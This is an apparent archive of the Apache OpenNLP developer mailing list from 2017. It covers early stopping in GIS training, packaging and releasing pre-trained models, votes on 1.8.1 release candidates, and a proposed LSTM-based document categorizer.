>Currently, GISTrainer has a private static final variable LLThreshold, 
> which controls if the change in the log likelihood between two iterations is 
> too small.  We could make this parameter. I am concerned about using the 
> accuracy to train the model.  If we use accuracy, the weight space may be 
> flat.
>
>Saurabh, you use the term “early stopping”.  In deep learning, early 
> stopping is used to prevent overtraining and improve generalization to unseen 
> data.  I am not sure early stopping serves the same purpose with GIS 
> training.  Does anyone know if early stopping improves generalization for a 
> maxent problem?
>
> Daniel
>
>> On Aug 24, 2017, at 4:48 AM, Joern Kottmann <kottm...@gmail.com> wrote:
>>
>> You are the first one who ever asked this question. I think we have this as
>> an option already on the gis trainer but it is not exposed all the way
>> through.
>>
>> Please open a jira and I can look at it next week.
>>
>> Jörn
>>
>> On Aug 21, 2017 5:11 PM, "Saurabh Jain" <saurabh4768j...@gmail.com> wrote:
>>
>>> Hi All
>>>
>>> How can we use early stopping while training/crossvalidating custom data
>>> with NameFinder ? What I want if change in likelihood value or accuracy of
>>> model is less than 0.05 between two steps (differ by 5 i.e compare x+5 step
>>> output with x step) then training should stop. I could not find anything
>>> regarding this in documentation. Can some one please help ?
>>>
>>> --
>>> *Thanks & Regards*
>>>
>>>
>>> *Saurabh Jain *
>>> *AI Developer*
>>>
>>> *Active Intelligence  *
>>>
>>> *"*
>>> *To do a thing yesterday was the best time . Second best time is today .” *
>>>
>


Re: Early stopping NameFinderME

2017-08-24 Thread Joern Kottmann
You are the first one who ever asked this question. I think we have this as
an option already on the gis trainer but it is not exposed all the way
through.

Please open a jira and I can look at it next week.

Jörn

On Aug 21, 2017 5:11 PM, "Saurabh Jain"  wrote:

> Hi All
>
> How can we use early stopping while training/crossvalidating custom data
> with NameFinder ? What I want if change in likelihood value or accuracy of
> model is less than 0.05 between two steps (differ by 5 i.e compare x+5 step
> output with x step) then training should stop. I could not find anything
> regarding this in documentation. Can some one please help ?
>
> --
> *Thanks & Regards*
>
>
> *Saurabh Jain *
> *AI Developer*
>
> *Active Intelligence  *
>
> *"*
> *To do a thing yesterday was the best time . Second best time is today .” *
>


Re: Problem of POSTaggerCrossValidator

2017-07-20 Thread Joern Kottmann
Hello,

attachments are not allowed on this list. Could you please copy the
error you got and the command you used into a mail?

Jörn

On Thu, Jul 20, 2017 at 6:31 AM, Santipong Thaiprayoon
 wrote:
> To whom it may concern.
>
>
> I used OpenNLP version 1.8.1 for training  a part-of-speech in Thai language
> but I got some problem that I have attached 2 files.
>
>
> I train the model by using POSTaggerCrossValidator function with Tag
> Dictionary that I get program error. After that I try to train by using
> POSTaggerTrainer with same command that the program is success.
>
>
> Please help me to solve this problem.
>
>
> Sincerely yours,
>
> Santipong
>
>
>
>
> 
>
> Disclaimer:
>
> This e-mail and any files transmitted with it may contain confidential and
> proprietary information of the National Science and Technology Development
> Agency (NSTDA), Thailand. They are intended solely for the use of the
> addressed individuals or entities. If you are not the intended recipient,
> you are required to immediately delete this e-mail and its contents from
> your system. Any disclosure, distribution, or action based upon the contents
> of this e-mail is strictly prohibited. Any views or opinions presented in
> this e-mail are solely those of the sender and do not necessarily represent
> those of NSTDA. NSTDA does not accept any responsibility for the content of
> this message or the consequences of any actions taken on the basis of the
> information provided. NSTDA accepts no liability for any damage caused by
> any virus or malware which may be inserted in this e-mail during
> transmission.


Re: Releasing a Language Detection Model

2017-07-11 Thread Joern Kottmann
1) This already included today by default in the model, it is possible
to also place more data in it e.g. a file which contains eval results,
a LICENSE and NOTICE file, etc

2) I would take a "best effort" approach and only publish one model
per task and data set, if there are not really good reasons to publish
multiple. In case of langdetect the perceptron and maxent models
perform almost identical, so no need to publish both. Probably we
should pick the perceptron model because it is slightly faster. And if
a user disagrees with us - that is totally fine - he can always train
himself with his personal preferences.

All the knowledge on how to train a model should be accessible via
git, and then it is just a matter of running the right command to
start it.

Jörn

On Tue, Jul 11, 2017 at 3:35 PM, Suneel Marthi <smar...@apache.org> wrote:
> ...one last point before wrapping up this discussion.  Is it possible to
> that u could have more than one lang detect model but trained with
> different algorithms - like say 'MaxEnt', 'Naive Bayes', ' Perceptron'
>
> Questions:
>
> 1.   Do we just publish one model trained on a specific algorithm, if so
> the metadata would have the algorithm information ?
>
> 2.  Do we publish multiple models for the same task, each trained on
> different algorithms ?
>
>
>
> On Tue, Jul 11, 2017 at 9:30 AM, Joern Kottmann <kottm...@gmail.com> wrote:
>
>> Hello,
>>
>> right, very good point, I also think that it is very important to load
>> a model in one from the classpath.
>>
>> I propose we have the following setup:
>> - One jar contains one or multiple model packages (thats the zip container)
>> - A model name itself should be kind of unique  e.g. eng-ud-token.bin
>> - A user loads the model via: new
>> SentenceModel(getClass().getResource("eng-ud-sent.bin")) <- the stream
>> gets then closed properly
>>
>>
>> Lets take away three things from this discussion:
>> 1) Store the data in a place where the community can access it
>> 2) Offer models on our download page similar as it is done today on
>> the SourceForge page
>> 3) Release models packed inside a jar file via maven central
>>
>> Jörn
>>
>>
>>
>>
>>
>>
>>
>> On Tue, Jul 11, 2017 at 3:00 PM, Aliaksandr Autayeu
>> <aliaksa...@autayeu.com> wrote:
>> > To clarify on models and jars.
>> >
>> > Putting model inside jar might not be a good idea. I mean here things
>> like
>> > bla-bla.jar/en-sent.bin. Our models are already zipped, so they are
>> "jars"
>> > already in a sense. We're good. However, current packaging and metadata
>> > might not be very classpath friendly.
>> >
>> > The use case I have in mind is being able to add needed models as
>> > dependencies and load them by writing a line of code. For this case
>> having
>> > all models in a root with the same name might not be very convenient.
>> Same
>> > goes for manifest. The name "manifest.properties" is quite generic and
>> it's
>> > not too far-fetched to see some clashes because some other lib also
>> > manifests something. It might be better to allow for some flexibility and
>> > to adhere to classpath conventions. For example, having manifests in
>> > something like org/apache/opennlp/models/manifest.properties. Or
>> > opennlp/tools/manifest.properties. And perhaps even allowing to
>> reference a
>> > model in the manifest, so the model can be put elsewhere. Just in case
>> > there are several custom models of the same kind for different pipelines
>> in
>> > the same app. For example, processing queries with one pipeline - one set
>> > of models - and processing documents with another pipeline - another set
>> of
>> > models. In this case allowing for different classpaths is needed.
>> >
>> > Perhaps to illustrate my thinking, something like this (which still
>> keeps a
>> > lot of possibilities open):
>> > en-sent.bin/opennlp/tools/sentdetect/manifest.properties (perhaps
>> contains
>> > a line with something like model =
>> > /opennlp/tools/sentdetect/model/sent.model)
>> > en-sent.bin/opennlp/tools/sentdetect/model/sent.model
>> >
>> > This allows including en-sent.bin as dependency. And then doing something
>> > like
>> > SentenceModel sdm = SentenceModel.getDefaultResourceModel(); // if we
>> want
>> > default models in this way. Seems verbose enough to allow for some safety
>> > through explicitness. That's if we

Re: Releasing a Language Detection Model

2017-07-11 Thread Joern Kottmann
Hello,

right, very good point, I also think that it is very important to load
a model in one from the classpath.

I propose we have the following setup:
- One jar contains one or multiple model packages (thats the zip container)
- A model name itself should be kind of unique  e.g. eng-ud-token.bin
- A user loads the model via: new
SentenceModel(getClass().getResource("eng-ud-sent.bin")) <- the stream
gets then closed properly


Lets take away three things from this discussion:
1) Store the data in a place where the community can access it
2) Offer models on our download page similar as it is done today on
the SourceForge page
3) Release models packed inside a jar file via maven central

Jörn







On Tue, Jul 11, 2017 at 3:00 PM, Aliaksandr Autayeu
<aliaksa...@autayeu.com> wrote:
> To clarify on models and jars.
>
> Putting model inside jar might not be a good idea. I mean here things like
> bla-bla.jar/en-sent.bin. Our models are already zipped, so they are "jars"
> already in a sense. We're good. However, current packaging and metadata
> might not be very classpath friendly.
>
> The use case I have in mind is being able to add needed models as
> dependencies and load them by writing a line of code. For this case having
> all models in a root with the same name might not be very convenient. Same
> goes for manifest. The name "manifest.properties" is quite generic and it's
> not too far-fetched to see some clashes because some other lib also
> manifests something. It might be better to allow for some flexibility and
> to adhere to classpath conventions. For example, having manifests in
> something like org/apache/opennlp/models/manifest.properties. Or
> opennlp/tools/manifest.properties. And perhaps even allowing to reference a
> model in the manifest, so the model can be put elsewhere. Just in case
> there are several custom models of the same kind for different pipelines in
> the same app. For example, processing queries with one pipeline - one set
> of models - and processing documents with another pipeline - another set of
> models. In this case allowing for different classpaths is needed.
>
> Perhaps to illustrate my thinking, something like this (which still keeps a
> lot of possibilities open):
> en-sent.bin/opennlp/tools/sentdetect/manifest.properties (perhaps contains
> a line with something like model =
> /opennlp/tools/sentdetect/model/sent.model)
> en-sent.bin/opennlp/tools/sentdetect/model/sent.model
>
> This allows including en-sent.bin as dependency. And then doing something
> like
> SentenceModel sdm = SentenceModel.getDefaultResourceModel(); // if we want
> default models in this way. Seems verbose enough to allow for some safety
> through explicitness. That's if we want any defaults at all.
> Or something like:
> SentenceModel sdm =
> SentenceModel.getResourceModel("/opennlp/tools/sentdetect/manifest.properties");
> Or
> SentenceModel sdm =
> SentenceModel.getResourceModel("/opennlp/tools/sentdetect/model/sent.model");
> Or more in-line with a current style:
> SentenceModel sdm = new
> SentenceModel("/opennlp/tools/sentdetect/model/sent.model"); // though here
> we commit to interpreting String as classpath reference. That's why I'd
> prefer more explicit method names.
> Or leave dealing with resources to the users, leave current code intact and
> provide only packaging and distribution:
> SentenceModel sdm = new
> SentenceModel(this.getClass().getResourceAsStream("/.../.../manifest or
> model"));
>
>
> And to add to model metadata also F1\accuracy (at least CV-based, for
> example 10-fold) for quick reference or quick understanding of what that
> model is capable of. Could be helpful for those with a bunch of models
> around. And for others as well to have a better insight about the model in
> question.
>
>
>
> On 11 July 2017 at 06:37, Chris Mattmann <mattm...@apache.org> wrote:
>
>> Hi,
>>
>> FWIW, I’ve seen CLI tools – lots in my day – that can load from the CLI to
>> override an
>> internal classpath dependency. This is for people in environments who want
>> a sensible
>> / delivered internal classpath default and the ability for run-time, non
>> zipped up/messing
>> with JAR file override. Think about people who are using OpenNLP in both
>> Java/Python
>> environments as an example.
>>
>> Cheers,
>> Chris
>>
>>
>>
>>
>> On 7/11/17, 3:25 AM, "Joern Kottmann" <kottm...@gmail.com> wrote:
>>
>> I would not change the CLI to load models from jar files. I never used
>> or saw a command line tool that expects a file as an input and would
>> then also load

Re: Releasing a Language Detection Model

2017-07-11 Thread Joern Kottmann
I would not change the CLI to load models from jar files. I never used
or saw a command line tool that expects a file as an input and would
then also load it from inside a jar file. It will be hard to
communicate how that works precisely in the CLI usage texts and this
is not a feature anyone would expect to be there. The intention of the
CLI is to give users the ability to quickly test OpenNLP before they
integrate it into their software and to train and evaluate models

Users who for some reason have a jar file with a model inside can just
write "unzip model.jar".

After all I think this is quite  a bit of complexity we would need to
add for it and it will have very limited use.

The use case of publishing jar files is to make the models easily
available to people who have a build system with dependency
management, they won't have to download models manually, and when they
update OpenNLP then can also update the models with a version string
change.

For the command line "quick start" use case we should offer the models
on a download page as we do today. This page could list both, the
download link and the maven dependency.

Jörn

On Mon, Jul 10, 2017 at 8:50 PM, William Colen <co...@apache.org> wrote:
> We need to address things such as sharing the evaluation results and how to
> reproduce the training.
>
> There are several possibilities for that, but there are points to consider:
>
> Will we store the model itself in a SCM repository or only the code that
> can build it?
> Will we deploy the models to a Maven Central repository? It is good for
> people using the Java API but not for command line interface, should we
> change the CLI to handle models in the classpath?
> Should we keep a copy of the training model or always download from the
> original provider? We can't guarantee that the corpus will be there
> forever, not only because it changed license, but simple because the
> provider is not keeping the server up anymore.
>
> William
>
>
>
> 2017-07-10 14:52 GMT-03:00 Joern Kottmann <kottm...@gmail.com>:
>
>> Hello all,
>>
>> since Apache OpenNLP 1.8.1 we have a new language detection component
>> which like all our components has to be trained. I think we should
>> release a pre-build model for it trained on the Leipzig corpus. This
>> will allow the majority of our users to get started very quickly with
>> language detection without the need to figure out on how to train it.
>>
>> How should this project release models?
>>
>> Jörn
>>


Re: Releasing a Language Detection Model

2017-07-11 Thread Joern Kottmann
; on which revision of that corpus, which part or subset, language, and
>> whether it had also other annotations (and respective models) for
>> connecting all the possible models from that corpora (e.g.
>> sent-tok-pos-chunk-...).
>>
>> Aliaksandr
>>
>> On 10 July 2017 at 17:41, Jeff Zemerick <jzemer...@apache.org> wrote:
>>
>>> +1 to an opennlp-models jar on Maven Central that contains the models.
>>> +1 to having the models available for download separately (if easily
>>> possible) for users who know what they want.
>>> +1 to having the training data shared somewhere with scripts to generate
>>> the models. It will help protect against losing data as William mentioned.
>>> I don't think we should depend on others to reliably host the data. I'll
>>> volunteer to help script the model generation to run on a fleet of EC2
>>> instances if it helps.
>>>
>>> If the user does not provide a model to use on the CLI, can the CLI tools
>>> look on the classpath for a model whose name fits the needed model (like
>>> en-ner-person.bin) and if found use it automatically?
>>>
>>> Jeff
>>>
>>>
>>>
>>> On Mon, Jul 10, 2017 at 5:06 PM, Chris Mattmann <mattm...@apache.org>
>>> wrote:
>>>
>>>> +1. In terms of releasing models, maybe an opennlp-models package, and
>>> then
>>>> using Maven structure of src/main/resources//*.bin
>>> for
>>>> putting the models.
>>>>
>>>> Then using an assembly descriptor to compile the above into a *-bin.jar?
>>>>
>>>> Cheers,
>>>> Chris
>>>>
>>>>
>>>>
>>>>
>>>> On 7/10/17, 4:09 PM, "Joern Kottmann" <kottm...@gmail.com> wrote:
>>>>
>>>>My opinion about this is that we should offer the model as maven
>>>>dependency for users who just want to use it in their projects, and
>>>>also offer models for download for people to quickly try out OpenNLP.
>>>>If the models can be downloaded, a new users could very quickly test
>>>>it via the command line.
>>>>
>>>>I don't really have any thoughts yet on how we should organize it, it
>>>>would probably be nice to have some place where we can share all the
>>>>training data, and then have the scripts to produce the models
>>> checked
>>>>in. It should be easy to retrain all the models in case we do a major
>>>>release.
>>>>
>>>>In case a corpus is vanishing we should drop support for it, must be
>>>>obsolete then.
>>>>
>>>>Jörn
>>>>
>>>>On Mon, Jul 10, 2017 at 8:50 PM, William Colen <co...@apache.org>
>>>> wrote:
>>>>> We need to address things such as sharing the evaluation results
>>> and
>>>> how to
>>>>> reproduce the training.
>>>>>
>>>>> There are several possibilities for that, but there are points to
>>>> consider:
>>>>>
>>>>> Will we store the model itself in a SCM repository or only the code
>>>> that
>>>>> can build it?
>>>>> Will we deploy the models to a Maven Central repository? It is good
>>>> for
>>>>> people using the Java API but not for command line interface,
>>> should
>>>> we
>>>>> change the CLI to handle models in the classpath?
>>>>> Should we keep a copy of the training model or always download from
>>>> the
>>>>> original provider? We can't guarantee that the corpus will be there
>>>>> forever, not only because it changed license, but simple because
>>> the
>>>>> provider is not keeping the server up anymore.
>>>>>
>>>>> William
>>>>>
>>>>>
>>>>>
>>>>> 2017-07-10 14:52 GMT-03:00 Joern Kottmann <kottm...@gmail.com>:
>>>>>
>>>>>> Hello all,
>>>>>>
>>>>>> since Apache OpenNLP 1.8.1 we have a new language detection
>>>> component
>>>>>> which like all our components has to be trained. I think we should
>>>>>> release a pre-build model for it trained on the Leipzig corpus.
>>> This
>>>>>> will allow the majority of our users to get started very quickly
>>>> with
>>>>>> language detection without the need to figure out on how to train
>>>> it.
>>>>>>
>>>>>> How should this project release models?
>>>>>>
>>>>>> Jörn
>>>>>>
>>>>
>>>>
>>>>
>>>>
>>>
>


Re: Releasing a Language Detection Model

2017-07-10 Thread Joern Kottmann
My opinion about this is that we should offer the model as maven
dependency for users who just want to use it in their projects, and
also offer models for download for people to quickly try out OpenNLP.
If the models can be downloaded, a new users could very quickly test
it via the command line.

I don't really have any thoughts yet on how we should organize it, it
would probably be nice to have some place where we can share all the
training data, and then have the scripts to produce the models checked
in. It should be easy to retrain all the models in case we do a major
release.

In case a corpus is vanishing we should drop support for it, must be
obsolete then.

Jörn

On Mon, Jul 10, 2017 at 8:50 PM, William Colen <co...@apache.org> wrote:
> We need to address things such as sharing the evaluation results and how to
> reproduce the training.
>
> There are several possibilities for that, but there are points to consider:
>
> Will we store the model itself in a SCM repository or only the code that
> can build it?
> Will we deploy the models to a Maven Central repository? It is good for
> people using the Java API but not for command line interface, should we
> change the CLI to handle models in the classpath?
> Should we keep a copy of the training model or always download from the
> original provider? We can't guarantee that the corpus will be there
> forever, not only because it changed license, but simple because the
> provider is not keeping the server up anymore.
>
> William
>
>
>
> 2017-07-10 14:52 GMT-03:00 Joern Kottmann <kottm...@gmail.com>:
>
>> Hello all,
>>
>> since Apache OpenNLP 1.8.1 we have a new language detection component
>> which like all our components has to be trained. I think we should
>> release a pre-build model for it trained on the Leipzig corpus. This
>> will allow the majority of our users to get started very quickly with
>> language detection without the need to figure out on how to train it.
>>
>> How should this project release models?
>>
>> Jörn
>>


Releasing a Language Detection Model

2017-07-10 Thread Joern Kottmann
Hello all,

since Apache OpenNLP 1.8.1 we have a new language detection component
which like all our components has to be trained. I think we should
release a pre-build model for it trained on the Leipzig corpus. This
will allow the majority of our users to get started very quickly with
language detection without the need to figure out on how to train it.

How should this project release models?

Jörn


Re: [VOTE] Apache OpenNLP 1.8.1 Release Candidate 3

2017-07-07 Thread Joern Kottmann
+1 i did run the eval the tests and they passed

Jörn

On Fri, Jul 7, 2017 at 1:06 PM, Bruno P. Kinoshita
 wrote:
> Build passing OK with the following environment:
> Apache Maven 3.3.9 (bb52d8502b132ec0a5a3f4c09453c07478323dc5; 
> 2015-11-11T05:41:47+13:00)
> Maven home: /opt/maven
> Java version: 1.8.0_131, vendor: Oracle Corporation
> Java home: /usr/lib/jvm/java-8-oracle/jre
> Default locale: en_US, platform encoding: UTF-8
> OS name: "linux", version: "4.4.0-83-generic", arch: "amd64", family: "unix"
>
> Had a look at simple reports (findbugs, pmd), all looking good.
> [ X ] +1 Release the packages as Apache OpenNLP 1.8.1
>
> ThanksBruno
> 
> On Thursday, 6 July 2017, 1:21:32 AM NZST, Suneel Marthi  
> wrote:
>
>
> The Apache OpenNLP PMC would like to call for a Vote on Apache OpenNLP 1.8.1
> Release Candidate 3.
>
> The Release artifacts can be downloaded from:
>
> https://repository.apache.org/content/repositories/orgapacheopennlp-1016/org/apache/opennlp/opennlp-distr/1.8.1/
>
> The release was made from the Apache OpenNLP 1.8.1 tag at
>
> https://github.com/apache/opennlp/tree/opennlp-1.8.1
>
> To use it in a maven build set the version for opennlp-tools or opennlp-uima
> to 1.8.1
>
> and add the following URL to your settings.xml file:
>
> https://repository.apache.org/content/repositories/orgapacheopennlp-1016/
>
> The artifacts have been signed with the Key - D3541808 found at
>
> http://people.apache.org/keys/group/opennlp.asc
>
> Please vote on releasing these packages as Apache OpenNLP 1.8.1. The vote is
>
> open for the next 72 hours *ending on Saturday, July 8AM EST *.
>
> Only votes from OpenNLP PMC are binding, but folks are welcome to check the
>
> release candidate and voice their approval or disapproval. The vote passes
>
> if at least three binding +1 votes are cast.
>
> [ ] +1 Release the packages as Apache OpenNLP 1.8.1
>
> [ ] -1 Do not release the packages because...
>
> Thanks again to all the committers and contributors for their work
> over the past
> few weeks.


Re: Document Categorizer based on Glove + LSTM (powered by DL4J)

2017-07-05 Thread Joern Kottmann
It would be really great if you could implement doccat format support
for the Stanford Large Moview Review dataset, that way we can also
easily train the normal doccat component with it. We should open a
jira for that.

Jörn

On Wed, Jul 5, 2017 at 7:29 PM, Thamme Gowda <tgow...@gmail.com> wrote:
> Got it, Thanks. We will do it.
>
> On Jul 5, 2017 9:43 AM, "Chris Mattmann" <mattm...@apache.org> wrote:
>
> Thanks Thamme.
>
> Please train on the datasets for sentiment analysis described here so we
> can align
> with the standard DocCat training I’m doing for sentiment analysis post
> 1.8.1.
>
> http://irds.usc.edu/SentimentAnalysisParser/datasets.html
>
> Thanks!
>
> Cheers,
> Chris
>
>
>
>
> On 7/5/17, 9:34 AM, "Thamme Gowda" <thammego...@apache.org> wrote:
>
> @Tomasso  @Jörn
> Thanks. I will update the PR by making it implement Doccat API.
>
> @Rodrigo
> I have not yet tested on the full Stanford Large Movie Review dataset.
> It
> takes more time to train, perhaps a few days for multiple passes on the
> entire dataset (on my i5 CPU, no GPUs at the moment).
> I had trained models (multiple times) with 3000 examples (1500 pos, 1500
> neg)  for two epochs, the F1 was approximately 0.70.
> I plan to train on the complete dataset sometime down the line and tune
> the
> network with more layers (that is the fun part). This PR is like
> setting up
> the infrastructure for it.
>
> @Chris
> Hi Prof. Thanks for the kind words! Just getting started with my new job
> here - more NLP and Machine Translation stuff to come.
>
> -Thamme
>
> On Wed, Jul 5, 2017 at 8:26 AM, Chris Mattmann <mattm...@apache.org>
> wrote:
>
> > Thamme, great job!
> >
> > (proud academic dad)
> >
> > Cheers,
> > Chris
> >
> >
> >
> >
> > On 7/5/17, 12:31 AM, "Joern Kottmann" <kottm...@gmail.com> wrote:
> >
> > +1 to merge this when it implements the Document Categorizer,
> then we
> > can also use those tools to train and evaluate it
> >
> > Jörn
> >
> > On Wed, Jul 5, 2017 at 9:28 AM, Rodrigo Agerri <rage...@apache.org
>>
> > wrote:
> > > Hello again,
> > >
> > > @Thamme, out of curiosity, do you have evaluation numbers on the
> > > Stanford Large Movie Review dataset?
> > >
> > > Best,
> > >
> > > Rodrigo
> > >
> > > On Wed, Jul 5, 2017 at 9:25 AM, Rodrigo Agerri <
> rage...@apache.org>
> > wrote:
> > >> +1 to Tommaso's comment. This would be very nice to have in the
> > project.
> > >>
> > >> R
> > >>
> > >> On Wed, Jul 5, 2017 at 9:19 AM, Tommaso Teofili
> > >> <tommaso.teof...@gmail.com> wrote:
> > >>> thanks Thamme for bringing this to the list!
> > >>>
> > >>>
> > >>> Il giorno mer 5 lug 2017 alle ore 03:49 Thamme Gowda <
> > tgow...@gmail.com> ha
> > >>> scritto:
> > >>>
> > >>>> Hello OpenNLP Devs,
> > >>>>
> > >>>> I am working with text classification using word embeddings
> like
> > >>>> Gloves/Word2Vec and LSTM networks.
> > >>>> It will be interesting to see if we can use it as document
> > categorizer,
> > >>>> especially for sentiment analysis in OpenNLP.
> > >>>>
> > >>>> I have already raised a PR to the sandbox repo -
> > >>>> https://github.com/apache/opennlp-sandbox/pull/3
> > >>>>
> > >>>> This is first version, and I expect to receive feedback from
> Dev
> > community
> > >>>> to make it work for everyone.
> > >>>>
> > >>>> Here are the design choices I have made for the initial
> version:
> > >>>>
> > >>>>- Using pre-trained Gloves - I felt the glove vector
> format is
> > clean,
> > >>>>easily customizable in terms of dimensions and vocabulary
> > size, and
> 

Re: Title: [VOTE] Apache OpenNLP 1.8.1 Release Candidate 2

2017-07-05 Thread Joern Kottmann
Lets cancel this vote. The LanguageDetectorContextGenerator class
should be public, but isn't. This will be fixed for RC 3 which will be
out a little bit later today.

Jörn

On Tue, Jul 4, 2017 at 3:55 PM, Suneel Marthi <smar...@apache.org> wrote:
> +1 binding
>
> 1. Verified hashs and sigs
> 2. clean build from {src} * {tar, zip} and all tests pass
>
>
> On Tue, Jul 4, 2017 at 9:16 AM, Joern Kottmann <kottm...@gmail.com> wrote:
>
>> Hi Folks,
>>
>>
>> I have posted a 2nd release candidate for the Apache OpenNLP 1.8.1
>> release and it is ready for testing.
>>
>>
>> The RC 2 distributables can be downloaded from here:
>> https://repository.apache.org/content/repositories/
>> orgapacheopennlp-1015/org/apache/opennlp/opennlp-distr/1.8.1/
>>
>>
>> The release was made from the Apache OpenNLP 1.8.1 tag at
>> https://github.com/apache/opennlp/tree/opennlp-1.8.1
>>
>>
>> To use it in a maven build set the version for opennlp-tools or
>> opennlp-uima to 1.8.1 and add the following URL to your settings.xml
>> file:
>> https://repository.apache.org/content/repositories/orgapacheopennlp-1015
>>
>> The release was made using the OpenNLP release process, documented on
>> the Wiki here:
>> https://cwiki.apache.org/confluence/display/OPENNLP/Release+Process
>>
>> The release contains quite some changes, please refer to the contained
>> issue list for details.
>>
>>
>> Please vote on releasing these packages as Apache OpenNLP 1.8.1. The vote
>> is
>> open for at least the next 72 hours.
>>
>>
>> Only votes from OpenNLP PMC are binding, but folks are welcome to check the
>> release candidate and voice their approval or disapproval. The vote passes
>> if at least three binding +1 votes are cast.
>>
>>
>> [ ] +1 Release the packages as Apache OpenNLP 1.8.1
>> [ ] -1 Do not release the packages because...
>>
>>
>> Thanks!
>>
>> Jörn
>>


Re: [VOTE] Apache OpenNLP 1.8.1 Release Candidate

2017-07-04 Thread Joern Kottmann
Thank you very much for that info. We reverted the change we did to
the sentence detector and will do this in a release after 1.8.1.

RC 2 is now available.

Jörn

On Sun, Jul 2, 2017 at 9:25 PM, Richard Eckart de Castilho
<r...@apache.org> wrote:
> On 02.07.2017, at 19:13, Joern Kottmann <kottm...@gmail.com> wrote:
>>
>> Hello,
>>
>> one question, did you retrain or use existing models?
>
> The respective unit-test trains and evaluates - doesn't use an existing model.
>
> Cheers,
>
> -- Richard


[GitHub] opennlp pull request #242: OPENNLP-1108: Set default eos char to null

2017-07-03 Thread kottmann
Github user kottmann closed the pull request at:

https://github.com/apache/opennlp/pull/242


---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


[GitHub] opennlp pull request #243: Revert "OPENNLP-1082: Add EOS to SDEventStream if...

2017-07-03 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/243

Revert "OPENNLP-1082: Add EOS to SDEventStream if missing"

This reverts commit b5b6d5c27443e1837b80b089206aad480852cd1c.

Thank you for contributing to Apache OpenNLP.

In order to streamline the review of the contribution we ask you
to ensure the following steps have been taken:

### For all changes:
- [ ] Is there a JIRA ticket associated with this PR? Is it referenced 
 in the commit message?

- [ ] Does your PR title start with OPENNLP- where  is the JIRA 
number you are trying to resolve? Pay particular attention to the hyphen "-" 
character.

- [ ] Has your PR been rebased against the latest commit within the target 
branch (typically master)?

- [ ] Is your initial contribution a single, squashed commit?

### For code changes:
- [ ] Have you ensured that the full suite of tests is executed via mvn 
clean install at the root opennlp folder?
- [ ] Have you written or updated unit tests to verify your changes?
- [ ] If adding new dependencies to the code, are these dependencies 
licensed in a way that is compatible for inclusion under [ASF 
2.0](http://www.apache.org/legal/resolved.html#category-a)? 
- [ ] If applicable, have you updated the LICENSE file, including the main 
LICENSE file in opennlp folder?
- [ ] If applicable, have you updated the NOTICE file, including the main 
NOTICE file found in opennlp folder?

### For documentation related changes:
- [ ] Have you ensured that format looks appropriate for the output in 
which it is rendered?

### Note:
Please ensure that once the PR is submitted, you check travis-ci for build 
issues and submit an update to your PR as soon as possible.


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp revert_default_eos

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/243.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #243


commit fdd5e4bc9bc0927cbaa7c560fc2ef8b7f03b6b89
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-07-03T14:27:32Z

Revert "OPENNLP-1082: Add EOS to SDEventStream if missing"

This reverts commit b5b6d5c27443e1837b80b089206aad480852cd1c.




---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


[GitHub] opennlp pull request #242: OPENNLP-1108: Set default eos char to null

2017-07-03 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/242

OPENNLP-1108: Set default eos char to null

Thank you for contributing to Apache OpenNLP.

In order to streamline the review of the contribution we ask you
to ensure the following steps have been taken:

### For all changes:
- [ ] Is there a JIRA ticket associated with this PR? Is it referenced 
 in the commit message?

- [ ] Does your PR title start with OPENNLP- where  is the JIRA 
number you are trying to resolve? Pay particular attention to the hyphen "-" 
character.

- [ ] Has your PR been rebased against the latest commit within the target 
branch (typically master)?

- [ ] Is your initial contribution a single, squashed commit?

### For code changes:
- [ ] Have you ensured that the full suite of tests is executed via mvn 
clean install at the root opennlp folder?
- [ ] Have you written or updated unit tests to verify your changes?
- [ ] If adding new dependencies to the code, are these dependencies 
licensed in a way that is compatible for inclusion under [ASF 
2.0](http://www.apache.org/legal/resolved.html#category-a)? 
- [ ] If applicable, have you updated the LICENSE file, including the main 
LICENSE file in opennlp folder?
- [ ] If applicable, have you updated the NOTICE file, including the main 
NOTICE file found in opennlp folder?

### For documentation related changes:
- [ ] Have you ensured that format looks appropriate for the output in 
which it is rendered?

### Note:
Please ensure that once the PR is submitted, you check travis-ci for build 
issues and submit an update to your PR as soon as possible.


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1108

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/242.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #242


commit 4ba702df7a994d6372951f90d8defe808b9a197a
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-07-03T11:24:41Z

OPENNLP-1108: Set default eos char to null




---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


Re: [VOTE] Apache OpenNLP 1.8.1 Release Candidate

2017-07-02 Thread Joern Kottmann
Hello,

one question, did you retrain or use existing models?

Jörn

On Sat, Jul 1, 2017 at 10:20 PM, Richard Eckart de Castilho
 wrote:
> Hi all,
>
> I ran a DKPro Core build against the RC. Looks mostly fine. No code changes
> are required after switching from 1.8.0 to 1.8.1. All unit tests except one
> run as before.
>
> I can observer a change when training a sentence splitter model.
>
> With 1.8.0, I get
>
>   F-score 0.937518
>   Precision   0.932157
>   Recall  0.942941
>
> With 1.8.1, I get
>
>   F-score 0.922556
>   Precision   0.909975
>   Recall  0.935490
>
> I am using the germeval-2014 data for training.
>
> It is not a big drop, but it still is a change - maybe an undesired one?
>
> Best,
>
> -- Richard
>


1.8.1 release

2017-07-01 Thread Joern Kottmann
Dear all,

We will be making a 1.8.1 release of OpenNLP  in the next days. All
issues in jira are closed now.

Jörn


